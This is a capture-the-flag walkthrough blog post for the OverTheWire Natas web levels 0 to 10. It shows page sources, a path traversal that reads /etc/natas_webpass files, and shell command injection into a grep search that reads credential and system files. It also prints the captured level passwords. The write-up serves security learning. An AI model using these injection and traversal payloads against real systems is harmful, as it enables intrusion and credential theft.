Security Exposed: Natas Level 0 to 10

This document is for educational purposes only, I take no responsibility for other peoples actions. This is a review of Natas Level 0 to 10:
http://overthewire.org/wargames/natas/

L 0

<html>
<head>

<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas0", "pass": "natas0" };</script></head>
<body>
<h1>natas0</h1>
<div id="content">
You can find the password for the next level on this page.


</div>
</body>
</html>

L1
Chrome -> Ctrl+U
<html>
<head>

<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas1", "pass": "gtVrDuiDfck831PqWsLEZy5gyDz1clto" };</script></head>
<body oncontextmenu="javascript:alert('right clicking has been blocked!');return false;">
<h1>natas1</h1>
<div id="content">
You can find the password for the
next level on this page, but rightclicking has been blocked!


</div>
</body>
</html>

L2
<html>
<head>

<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas2", "pass": "ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi" };</script></head>
<body>
<h1>natas2</h1>
<div id="content">
There is nothing on this page
<img src="files/pixel.png">
</div>
</body></html>

http://natas.labs.overthewire.org/js/wechall-data.js
var wechalldata = {
"natas0": 1,
"natas1": 2,
"natas2": 3,
"natas3": 4,
"natas4": 5,
"natas5": 6,
"natas6": 7,
"natas7": 8,
"natas8": 15,
"natas9": 14,
"natas10": 13,
"natas11": 12,
"natas12": 11,
"natas13": 10,
"natas14": 9,
"natas15": 16,
"natas16": 17,
"natas17": 18,
"natas18": 137,
"natas19": 138,
"natas20": 139,
"natas21": 140,
"natas22": 141,
"natas23": 142,
"natas24": 213,
"natas25": 214,
"natas26": 215,
"natas27": 216
}

http://natas2.natas.labs.overthewire.org/files/
[IMG] pixel.png 2016-06-25 11:58 303
[TXT] users.txt 2016-06-25 12:42 145

# username:password
alice:BYNdCesZqW
bob:jw2ueICLvT
charlie:G5vCxkVV3m
natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
eve:zo4mJWyNj2
mallory:9urtcpzBmH

L3:
User-agent: *
Disallow: /s3cr3t/

http://natas3.natas.labs.overthewire.org//s3cr3t/users.txt
natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

L4:
Burp -> Proxy -> Intercept On -> Add -> Refferer natas5.natas.labs.overthewire.org

Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

L5:
GET / HTTP/1.1
Host: natas5.natas.labs.overthewire.org
Cache-Control: max-age=0
Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: bg,en-US;q=0.8,en;q=0.6
Cookie: __cfduid=ddd2731304b504d954af409bf2c0724731481120164; loggedin=1
DNT: 1
Connection: close

<html>
<head>

<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas5", "pass": "iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" };</script></head>
<body>
<h1>natas5</h1>
<div id="content">
Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1</div>
</body>
</html>

L6:
<html>
<head>

<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas6", "pass": "<censored>" };</script></head>
<body>
<h1>natas6</h1>
<div id="content">

<?

include "includes/secret.inc";

if(array_key_exists("submit", $_POST)) {
if($secret == $_POST['secret']) {
print "Access granted. The password for natas7 is <censored>";
} else {
print "Wrong secret";
}
}
?>

<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

http://natas6.natas.labs.overthewire.org/includes/secret.inc
<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>

Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

L7:

<html>
<head>

<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas7", "pass": "7z3hEENjQtflzgnT29q7wAvMNfZdh0i9" };</script></head>
<body>
<h1>natas7</h1>
<div id="content">

<a href="index.php?page=home">Home</a>
<a href="index.php?page=about">About</a>
<br>
<br>


</div>
</body>
</html>

http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

L8:
<html>
<head>

<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas8", "pass": "<censored>" };</script></head>
<body>
<h1>natas8</h1>
<div id="content">

<?

$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
return bin2hex(strrev(base64_encode($secret)));
}

if(array_key_exists("submit", $_POST)) {
if(encodeSecret($_POST['secret']) == $encodedSecret) {
print "Access granted. The password for natas9 is <censored>";
} else {
print "Wrong secret";
}
}
?>

<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

echo 3d3d516343746d4d6d6c315669563362 | xxd -r -p | rev | base64 -d

oubWYf2kBq

Access granted. The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

L9:
<html>
<head>

<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas9", "pass": "W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl" };</script></head>
<body>
<h1>natas9</h1>
<div id="content">
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>

Output:
<pre>
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

<html>
<head>

<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas9", "pass": "<censored>" };</script></head>
<body>
<h1>natas9</h1>
<div id="content">
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>

Output:
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}

if($key != "") {
passthru("grep -i $key dictionary.txt");
}
?>
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

http://natas9.natas.labs.overthewire.org/dictionary.txt

test; ls -la ../
Output:
-rw-r----- 1 natas9 natas9 460878 Jun 25 2016 dictionary.txt

../:
total 156
drwxr-xr-x 39 root root 4096 Jul 10 14:12 .
drwxr-xr-x 5 root root 4096 Nov 14 2014 ..
drwxr-xr-x 5 root root 4096 Jun 25 2016 main
drwxr-x--- 2 natas0 natas0 4096 Jun 25 2016 natas0
drwxr-x--- 2 natas1 natas1 4096 Jun 25 2016 natas1
drwxr-x--- 2 natas10 natas10 4096 Jun 25 2016 natas10
drwxr-x--- 2 natas11 natas11 4096 Jun 25 2016 natas11
drwxr-x--- 3 natas12 natas12 4096 Jun 25 2016 natas12
drwxr-x--- 3 natas13 natas13 4096 Jun 25 2016 natas13
drwxr-x--- 2 natas14 natas14 4096 Jun 25 2016 natas14
drwxr-x--- 2 natas15 natas15 4096 Jun 25 2016 natas15
drwxr-x--- 2 natas16 natas16 4096 Jun 25 2016 natas16
drwxr-x--- 2 natas17 natas17 4096 Jul 10 14:12 natas17
drwxr-x--- 2 natas18 natas18 4096 Jun 25 2016 natas18
drwxr-x--- 2 natas19 natas19 4096 Jun 25 2016 natas19
drwxr-x--- 3 natas2 natas2 4096 Jun 25 2016 natas2
drwxr-x--- 2 natas20 natas20 4096 Jun 25 2016 natas20
drwxr-x--- 2 natas21 natas21 4096 Jun 25 2016 natas21
drwxr-x--- 2 natas21 natas21 4096 Jun 25 2016 natas21-experimenter
drwxr-x--- 2 natas22 natas22 4096 Jun 25 2016 natas22
drwxr-x--- 2 natas23 natas23 4096 Jun 25 2016 natas23
drwxr-x--- 2 natas24 natas24 4096 Jun 25 2016 natas24
drwxr-x--- 3 natas25 natas25 4096 Jun 25 2016 natas25
drwxr-x--- 3 natas26 natas26 4096 Jun 25 2016 natas26
drwxr-x--- 2 natas27 natas27 4096 Jun 25 2016 natas27
drwxr-x--- 2 natas28 natas28 4096 Jun 25 2016 natas28
drwxr-x--- 2 natas29 natas29 4096 Jun 25 2016 natas29
drwxr-x--- 3 natas3 natas3 4096 Jun 25 2016 natas3
drwxr-x--- 2 natas30 natas30 4096 Jun 25 2016 natas30
drwxr-x--- 3 natas31 natas31 4096 Jun 25 2016 natas31
drwxr-x--- 3 natas32 natas32 4096 Jun 25 2016 natas32
drwxr-x--- 2 natas33 natas33 4096 Jun 25 2016 natas33
drwxr-x--- 2 natas4 natas4 4096 Jun 25 2016 natas4
drwxr-x--- 2 natas5 natas5 4096 Jun 25 2016 natas5
drwxr-x--- 3 natas6 natas6 4096 Jun 25 2016 natas6
drwxr-x--- 2 natas7 natas7 4096 Jun 25 2016 natas7
drwxr-x--- 2 natas8 natas8 4096 Jun 25 2016 natas8
drwxr-x--- 2 natas9 natas9 4096 Jun 25 2016 natas9
drwxr-x--- 4 root www-data 4096 Jun 25 2016 stats

test; ls -la ../../../../../-rw-r----- 1 natas9 natas9 460878 Jun 25 2016 dictionary.txt

../../../../../:
total 7965
drwxr-xr-x 26 root root 4096 Mar 13 2016 .
drwxr-xr-x 26 root root 4096 Mar 13 2016 ..
-rw-r--r-- 1 root root 2797 Nov 4 2015 README.txt
lrwxrwxrwx 1 root root 15 Nov 14 2014 behemoth -> /games/behemoth
drwxr-xr-x 2 root root 4096 Nov 17 09:14 bin
drwxr-xr-x 2 root root 4096 Apr 20 2014 boot
drwxr-xr-x 12 root root 13680 Dec 23 13:00 dev
drwxr-xr-x 7 root root 4096 Jan 12 2015 drifter
lrwxrwxrwx 1 root root 11 Nov 14 2014 eloi -> /games/eloi
drwxr-xr-x 108 root root 4096 Jan 6 13:46 etc
drwxr-xr-x 11 root root 1024 Mar 18 2015 games
drwxr-xr-x 172 root root 4096 Jul 10 14:12 home
lrwxrwxrwx 1 root root 14 Nov 14 2014 krypton -> /games/krypton
drwxr-xr-x 18 root root 4096 Jun 10 2016 lib
drwxr-xr-x 2 root root 4096 Jun 10 2016 lib32
drwxr-xr-x 2 root root 4096 Jun 10 2016 lib64
drwxr-xr-x 2 root root 4096 Jun 10 2016 libx32
drwx------ 2 root root 16384 Apr 20 2014 lost+found
lrwxrwxrwx 1 root root 14 Nov 14 2014 manpage -> /games/manpage
lrwxrwxrwx 1 root root 11 Nov 14 2014 maze -> /games/maze
drwxr-xr-x 3 root root 4096 Apr 20 2014 media
drwxr-xr-x 2 root root 4096 Apr 10 2014 mnt
lrwxrwxrwx 1 root root 13 Nov 14 2014 narnia -> /games/narnia
drwxr-xr-x 2 root root 4096 Apr 16 2014 opt
dr-xr-xr-x 547 root root 0 Dec 23 13:00 proc
drwx------ 11 root root 4096 Jul 10 14:12 root
drwxr-xr-x 18 root root 680 Jan 6 20:52 run
drwxr-xr-x 2 root root 12288 Sep 30 13:28 sbin
lrwxrwxrwx 1 root root 13 Nov 14 2014 semtex -> /games/semtex
drwxr-xr-x 2 root root 4096 Apr 16 2014 srv
dr-xr-xr-x 13 root root 0 Dec 23 13:29 sys
drwxrwx-wt 1 root root 8036352 Jan 6 20:52 tmp
drwxr-xr-x 12 root root 4096 Nov 14 2014 usr
lrwxrwxrwx 1 root root 13 Nov 14 2014 utumno -> /games/utumno
drwxr-xr-x 15 root root 4096 Nov 14 2014 var
lrwxrwxrwx 1 root root 13 Nov 14 2014 vortex -> /games/vortex

test;cat ../../../../../README.txt
Output:

,----.. ,----, .---.
/ / \ ,/ .`| /. ./|
/ . : ,` .' : .--'. ' ;
. / ;. \ ; ; / /__./ \ : |
. ; / ` ; .'___,/ ,' .--'. ' \' .
; | ; \ ; | | : | /___/ \ | ' '
| : | ; | ' ; |.'; ; ; \ \; :
. | ' ' ' : `----' | | \ ; ` |
' ; \; / | ' : ; . \ .\ ;
\ \ ', / | | ' \ \ ' \ |
; : / ' : | : ' |--"
\ \ .' ; |.' \ \ ;
www. `---` ver '---' he '---" ire.org

Welcome to the OverTheWire games machine!

If you find any problems, please report them to Steven on
irc.overthewire.org.

--[ Playing the games ]--

This machine holds several wargames.
If you are playing "somegame", then:

* USERNAMES are somegame0, somegame1, ...
* Most LEVELS are stored in /somegame/.
* PASSWORDS for each level are stored in /etc/somegame_pass/.

Write-access to homedirectories is disabled. It is advised to create a
working directory with a hard-to-guess name in /tmp/. You can use the
command "mktemp -d" in order to generate a random and hard to guess
directory in /tmp/. Read-access to both /tmp/ and /proc/ is disabled
so that users can not snoop on eachother.

Please play nice:

* don't leave orphan processes running
* don't leave exploit-files laying around
* don't annoy other players
* don't post passwords or spoilers
* again, DONT POST SPOILERS!
This includes writeups of your solution on your blog or website!

--[ Tips ]--

This machine has a 64bit processor and many security-features enabled
by default, although ASLR has been switched off. The following
compiler flags might be interesting:

-m32 compile for 32bit
-fno-stack-protector disable ProPolice
-Wl,-z,norelro disable relro

In addition, the execstack tool can be used to flag the stack as
executable on ELF binaries.

Finally, network-access is limited for most levels by a local
firewall.

--[ Tools ]--

For your convenience we have installed a few usefull tools which you can find
in the following locations:

* peda (https://github.com/longld/peda.git) in /usr/local/peda/
* gdbinit (https://github.com/gdbinit/Gdbinit) in /usr/local/gdbinit/
* pwntools (https://github.com/Gallopsled/pwntools) in /usr/src/pwntools/
* radare2 (http://www.radare.org/) should be in $PATH

--[ More information ]--

For more information regarding individual wargames, visit
http://www.overthewire.org/wargames/

For questions or comments, contact us through IRC on
irc.overthewire.org.

test;cat ../../../../../etc/natas_webpass/natas10
nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

test;cat ../../../../../etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS

L10:
<html>
<head>

<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas10", "pass": "<censored>" };</script></head>
<body>
<h1>natas10</h1>
<div id="content">

For security reasons, we now filter on certain characters<br/><br/>
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>

Output:
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}

if($key != "") {
if(preg_match('/[;|&]/',$key)) {
print "Input contains an illegal character!";
} else {
passthru("grep -i $key dictionary.txt");
}
}
?>
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

. /etc/natas_webpass/natas11
U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

Regards,
Yuriy Stanchev/URIX

Pages

Thursday 19 January 2017

Natas Level 0 to 10

About Me

Total Pageviews